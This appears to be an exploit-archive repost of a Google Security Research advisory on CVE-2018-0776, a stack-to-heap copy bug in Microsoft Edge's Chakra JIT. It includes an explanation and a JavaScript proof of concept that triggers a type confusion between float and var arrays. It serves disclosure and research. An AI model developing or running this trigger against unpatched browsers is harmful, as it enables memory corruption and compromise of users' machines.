exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Edge Chakra JIT Stack-To-Heap Copy Bug

Microsoft Edge Chakra JIT Stack-To-Heap Copy Bug
Posted Jan 18, 2018
Authored by Google Security Research, lokihardt

Microsoft Edge Chakra JIT suffers from a stack-to-heap copy bug.

tags | exploit
advisories | CVE-2018-0776
SHA-256 | a1676ee18b08a013b47916fe92086dcbe4bcd51909427cb9e5b3b106e5024a96

Microsoft Edge Chakra JIT Stack-To-Heap Copy Bug

Change Mirror Download
Microsoft Edge: Chakra: JIT: stack-to-heap copy bug 

CVE-2018-0776


If variables don't escape the scope, the variables can be allocated to the stack. However, there are some situations, such as when a bailout happens or accessing to arguments containing stack-allocated variables, where those variables should not exist in the stack. In these cases, the stack-allocated variables are copied to the heap. This is performed by the "*::BoxStackInstance" methods.

Here's an example.
function inlinee() {
return inlinee.arguments[0];
}

function opt() {
let stack_arr = [];
// allocate segment to the heap
for (let i = 0; i < 100; i++)
stack_arr[i] = 0;

let heap_arr = inlinee(stack_arr);
heap_arr[0] = 2;

print(stack_arr[0]);
}

function main() {
for (let i = 0; i < 100; i++) {
opt();
}
}

main();

"stack_arr" is allocated in the stack. When accessing "inlinee.arguments", the stack-allocated variable gets copied to the heap. Therefore, the copied-heap-variable "heap_arr" has the same structure with "stack_arr". The code shows that the two variables share the same buffer by printing out "2". This means, even if one of those arrays' type changes, the other array can access the same buffer with the previous type.

PoC:
function inlinee() {
return inlinee.arguments[0];
}

function opt(convert_to_var_array) {
/*
To make the in-place type conversion happen, it requires to segment.
*/

let stack_arr = []; // JavascriptNativeFloatArray
stack_arr[10000] = 1.1;
stack_arr[20000] = 2.2;

let heap_arr = inlinee(stack_arr);
convert_to_var_array(heap_arr);

stack_arr[10000] = 2.3023e-320;

return heap_arr[10000];
}

function main() {
for (let i = 0; i < 10000; i++) {
opt(new Function('')); // Prevents to be inlined
}

print(opt(heap_arr => {
heap_arr[10000] = {}; // ConvertToVarArray
}));
}

main();


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close